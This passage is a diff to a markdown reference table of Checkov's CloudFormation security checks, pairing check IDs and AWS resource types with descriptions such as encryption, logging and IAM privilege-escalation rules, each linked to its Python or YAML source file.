-| 163 | CKV_AWS_361 | resource | AWS::Neptune::DBCluster                   | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                     |
-| 164 | CKV_AWS_363 | resource | AWS::Lambda::Function                     | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
-| 165 | CKV_AWS_363 | resource | AWS::Serverless::Function                 | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                 |
-| 166 | CKV_AWS_364 | resource | AWS::Lambda::Permission                   | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                 |
-| 167 | CKV2_AWS_33 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                 |
+|  70 | CKV_AWS_80  | resource | AWS::MSK::Cluster                         | Ensure MSK Cluster logging is enabled                                                                                                                                                                    | Cloudformation | [MSKClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py)                                                                             |
+|  71 | CKV_AWS_81  | resource | AWS::MSK::Cluster                         | Ensure MSK Cluster encryption in rest and transit is enabled                                                                                                                                             | Cloudformation | [MSKClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py)                                                                       |
+|  72 | CKV_AWS_82  | resource | AWS::Athena::WorkGroup                    | Ensure Athena Workgroup should enforce configuration to prevent client disabling encryption                                                                                                              | Cloudformation | [AthenaWorkgroupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AthenaWorkgroupConfiguration.py)                                                       |
+|  73 | CKV_AWS_83  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain enforces HTTPS                                                                                                                                                               | Cloudformation | [ElasticsearchDomainEnforceHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py)                                                 |
+|  74 | CKV_AWS_84  | resource | AWS::Elasticsearch::Domain                | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
+|  75 | CKV_AWS_84  | resource | AWS::OpenSearchService::Domain            | Ensure Elasticsearch Domain Logging is enabled                                                                                                                                                           | Cloudformation | [ElasticsearchDomainLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py)                                                           |
+|  76 | CKV_AWS_85  | resource | AWS::DocDB::DBCluster                     | Ensure DocumentDB Logging is enabled                                                                                                                                                                     | Cloudformation | [DocDBLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBLogging.py)                                                                                       |
+|  77 | CKV_AWS_86  | resource | AWS::CloudFront::Distribution             | Ensure CloudFront Distribution has Access Logging enabled                                                                                                                                                | Cloudformation | [CloudfrontDistributionLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionLogging.py)                                                     |
+|  78 | CKV_AWS_87  | resource | AWS::Redshift::Cluster                    | Redshift cluster should not be publicly accessible                                                                                                                                                       | Cloudformation | [RedshiftClusterPubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterPubliclyAccessible.py)                                             |
+|  79 | CKV_AWS_88  | resource | AWS::EC2::Instance                        | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
+|  80 | CKV_AWS_88  | resource | AWS::EC2::LaunchTemplate                  | EC2 instance should not have public IP.                                                                                                                                                                  | Cloudformation | [EC2PublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2PublicIP.py)                                                                                         |
+|  81 | CKV_AWS_89  | resource | AWS::DMS::ReplicationInstance             | DMS replication instance should not be publicly accessible                                                                                                                                               | Cloudformation | [DMSReplicationInstancePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py)                               |
+|  82 | CKV_AWS_90  | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB TLS is not disabled                                                                                                                                                                    | Cloudformation | [DocDBTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBTLS.py)                                                                                               |
+|  83 | CKV_AWS_91  | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure the ELBv2 (Application/Network) has access logging enabled                                                                                                                                        | Cloudformation | [ELBv2AccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBv2AccessLogs.py)                                                                                 |
+|  84 | CKV_AWS_92  | resource | AWS::ElasticLoadBalancing::LoadBalancer   | Ensure the ELB has access logging enabled                                                                                                                                                                | Cloudformation | [ELBAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ELBAccessLogs.py)                                                                                     |
+|  85 | CKV_AWS_94  | resource | AWS::Glue::DataCatalogEncryptionSettings  | Ensure Glue Data Catalog Encryption is enabled                                                                                                                                                           | Cloudformation | [GlueDataCatalogEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py)                                                             |
+|  86 | CKV_AWS_95  | resource | AWS::ApiGatewayV2::Stage                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
+|  87 | CKV_AWS_95  | resource | AWS::Serverless::HttpApi                  | Ensure API Gateway V2 has Access Logging enabled                                                                                                                                                         | Cloudformation | [APIGatewayV2AccessLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayV2AccessLogging.py)                                                             |
+|  88 | CKV_AWS_96  | resource | AWS::RDS::DBCluster                       | Ensure all data stored in Aurora is securely encrypted at rest                                                                                                                                           | Cloudformation | [AuroraEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AuroraEncryption.py)                                                                               |
+|  89 | CKV_AWS_97  | resource | AWS::ECS::TaskDefinition                  | Ensure Encryption in transit is enabled for EFS volumes in ECS Task definitions                                                                                                                          | Cloudformation | [ECSTaskDefinitionEFSVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py)                                       |
+|  90 | CKV_AWS_99  | resource | AWS::Glue::SecurityConfiguration          | Ensure Glue Security Configuration Encryption is enabled                                                                                                                                                 | Cloudformation | [GlueSecurityConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py)                                                             |
+|  91 | CKV_AWS_100 | resource | AWS::EKS::Nodegroup                       | Ensure AWS EKS node group does not have implicit SSH access from 0.0.0.0/0                                                                                                                               | Cloudformation | [EKSNodeGroupRemoteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSNodeGroupRemoteAccess.py)                                                               |
+|  92 | CKV_AWS_101 | resource | AWS::Neptune::DBCluster                   | Ensure Neptune logging is enabled                                                                                                                                                                        | Cloudformation | [NeptuneClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterLogging.py)                                                                     |
+|  93 | CKV_AWS_103 | resource | AWS::ElasticLoadBalancingV2::Listener     | Ensure that Load Balancer Listener is using at least TLS v1.2                                                                                                                                            | Cloudformation | [ALBListenerTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py)                                                                               |
+|  94 | CKV_AWS_104 | resource | AWS::DocDB::DBClusterParameterGroup       | Ensure DocumentDB has audit logs enabled                                                                                                                                                                 | Cloudformation | [DocDBAuditLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py)                                                                                   |
+|  95 | CKV_AWS_105 | resource | AWS::Redshift::ClusterParameterGroup      | Ensure Redshift uses SSL                                                                                                                                                                                 | Cloudformation | [RedShiftSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedShiftSSL.py)                                                                                         |
+|  96 | CKV_AWS_107 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  97 | CKV_AWS_107 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  98 | CKV_AWS_107 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+|  99 | CKV_AWS_107 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+| 100 | CKV_AWS_107 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow credentials exposure                                                                                                                                                  | Cloudformation | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMCredentialsExposure.py)                                                                   |
+| 101 | CKV_AWS_108 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 102 | CKV_AWS_108 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 103 | CKV_AWS_108 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 104 | CKV_AWS_108 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 105 | CKV_AWS_108 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow data exfiltration                                                                                                                                                     | Cloudformation | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMDataExfiltration.py)                                                                         |
+| 106 | CKV_AWS_109 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 107 | CKV_AWS_109 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 108 | CKV_AWS_109 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 109 | CKV_AWS_109 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 110 | CKV_AWS_109 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow permissions management without constraints                                                                                                                            | Cloudformation | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPermissionsManagement.py)                                                               |
+| 111 | CKV_AWS_110 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 112 | CKV_AWS_110 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 113 | CKV_AWS_110 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 114 | CKV_AWS_110 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 115 | CKV_AWS_110 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow privilege escalation                                                                                                                                                  | Cloudformation | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py)                                                                   |
+| 116 | CKV_AWS_111 | resource | AWS::IAM::Group                           | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 117 | CKV_AWS_111 | resource | AWS::IAM::ManagedPolicy                   | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 118 | CKV_AWS_111 | resource | AWS::IAM::Policy                          | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 119 | CKV_AWS_111 | resource | AWS::IAM::Role                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 120 | CKV_AWS_111 | resource | AWS::IAM::User                            | Ensure IAM policies does not allow write access without constraints                                                                                                                                      | Cloudformation | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMWriteAccess.py)                                                                                   |
+| 121 | CKV_AWS_115 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
+| 122 | CKV_AWS_115 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for function-level concurrent execution limit                                                                                                              | Cloudformation | [LambdaFunctionLevelConcurrentExecutionLimit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionLevelConcurrentExecutionLimit.py)                         |
+| 123 | CKV_AWS_116 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
+| 124 | CKV_AWS_116 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured for a Dead Letter Queue(DLQ)                                                                                                                               | Cloudformation | [LambdaDLQConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaDLQConfigured.py)                                                                         |
+| 125 | CKV_AWS_117 | resource | AWS::Lambda::Function                     | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
+| 126 | CKV_AWS_117 | resource | AWS::Serverless::Function                 | Ensure that AWS Lambda function is configured inside a VPC                                                                                                                                               | Cloudformation | [LambdaInVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaInVPC.py)                                                                                         |
+| 127 | CKV_AWS_118 | resource | AWS::RDS::DBInstance                      | Ensure that enhanced monitoring is enabled for Amazon RDS instances                                                                                                                                      | Cloudformation | [RDSEnhancedMonitorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSEnhancedMonitorEnabled.py)                                                             |
+| 128 | CKV_AWS_119 | resource | AWS::DynamoDB::Table                      | Ensure DynamoDB Tables are encrypted using a KMS Customer Managed CMK                                                                                                                                    | Cloudformation | [DynamoDBTablesEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamoDBTablesEncrypted.py)                                                                 |
+| 129 | CKV_AWS_120 | resource | AWS::ApiGateway::Stage                    | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
+| 130 | CKV_AWS_120 | resource | AWS::Serverless::Api                      | Ensure API Gateway caching is enabled                                                                                                                                                                    | Cloudformation | [APIGatewayCacheEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayCacheEnable.py)                                                                     |
+| 131 | CKV_AWS_123 | resource | AWS::EC2::VPCEndpointService              | Ensure that VPC Endpoint Service is configured for Manual Acceptance                                                                                                                                     | Cloudformation | [VPCEndpointAcceptanceConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/VPCEndpointAcceptanceConfigured.py)                                                 |
+| 132 | CKV_AWS_131 | resource | AWS::ElasticLoadBalancingV2::LoadBalancer | Ensure that ALB drops HTTP headers                                                                                                                                                                       | Cloudformation | [ALBDropHttpHeaders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ALBDropHttpHeaders.py)                                                                           |
+| 133 | CKV_AWS_136 | resource | AWS::ECR::Repository                      | Ensure that ECR repositories are encrypted using KMS                                                                                                                                                     | Cloudformation | [ECRRepositoryEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRRepositoryEncrypted.py)                                                                   |
+| 134 | CKV_AWS_149 | resource | AWS::SecretsManager::Secret               | Ensure that Secrets Manager secret is encrypted using KMS CMK                                                                                                                                            | Cloudformation | [SecretManagerSecretEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecretManagerSecretEncrypted.py)                                                       |
+| 135 | CKV_AWS_154 | resource | AWS::Redshift::Cluster                    | Ensure Redshift is not deployed outside of a VPC                                                                                                                                                         | Cloudformation | [RedshiftInEc2ClassicMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftInEc2ClassicMode.py)                                                               |
+| 136 | CKV_AWS_155 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace user volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceUserVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceUserVolumeEncrypted.py)                                                       |
+| 137 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace                | Ensure that Workspace root volumes are encrypted                                                                                                                                                         | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py)                                                       |
+| 138 | CKV_AWS_157 | resource | AWS::RDS::DBInstance                      | Ensure that RDS instances have Multi-AZ enabled                                                                                                                                                          | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py)                                                                             |
+| 139 | CKV_AWS_158 | resource | AWS::Logs::LogGroup                       | Ensure that CloudWatch Log Group is encrypted by KMS                                                                                                                                                     | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py)                                                               |
+| 140 | CKV_AWS_160 | resource | AWS::Timestream::Database                 | Ensure that Timestream database is encrypted with KMS CMK                                                                                                                                                | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py)                                                               |
+| 141 | CKV_AWS_161 | resource | AWS::RDS::DBInstance                      | Ensure RDS database has IAM authentication enabled                                                                                                                                                       | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py)                                                                       |
+| 142 | CKV_AWS_162 | resource | AWS::RDS::DBCluster                       | Ensure RDS cluster has IAM authentication enabled                                                                                                                                                        | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py)                                                         |
+| 143 | CKV_AWS_163 | resource | AWS::ECR::Repository                      | Ensure ECR image scanning on push is enabled                                                                                                                                                             | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py)                                                                               |
+| 144 | CKV_AWS_164 | resource | AWS::Transfer::Server                     | Ensure Transfer Server is not exposed publicly.                                                                                                                                                          | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py)                                                                   |
+| 145 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable                | Ensure DynamoDB global table point in time recovery (backup) is enabled                                                                                                                                  | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py)                                                         |
+| 146 | CKV_AWS_166 | resource | AWS::Backup::BackupVault                  | Ensure Backup Vault is encrypted at rest using KMS CMK                                                                                                                                                   | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py)                                                                       |
+| 147 | CKV_AWS_170 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger permissions mode is set to STANDARD                                                                                                                                                   | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py)                                                             |
+| 148 | CKV_AWS_172 | resource | AWS::QLDB::Ledger                         | Ensure QLDB ledger has deletion protection enabled                                                                                                                                                       | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py)                                                       |
+| 149 | CKV_AWS_173 | resource | AWS::Lambda::Function                     | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
+| 150 | CKV_AWS_173 | resource | AWS::Serverless::Function                 | Check encryption settings for Lambda environment variable                                                                                                                                                | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py)                                         |
+| 151 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution             | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2                                                                                                                                      | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py)                                                                                 |
+| 152 | CKV_AWS_187 | resource | AWS::SageMaker::Domain                    | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                             |
+| 153 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance          | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK)                                                                                                    | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py)                                             |
+| 154 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL                        | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                                          | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py)                                                                           |
+| 155 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Logging enabled                                                                                                                                                                       | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py)                                                                                   |
+| 156 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi                  | Ensure AppSync has Field-Level logs enabled                                                                                                                                                              | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py)                                                                     |
+| 157 | CKV_AWS_195 | resource | AWS::Glue::Crawler                        | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 158 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint                    | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 159 | CKV_AWS_195 | resource | AWS::Glue::Job                            | Ensure Glue component has a security configuration associated                                                                                                                                            | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py)                                               |
+| 160 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker                     | Ensure MQ Broker Audit logging is enabled                                                                                                                                                                | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py)                                                                       |
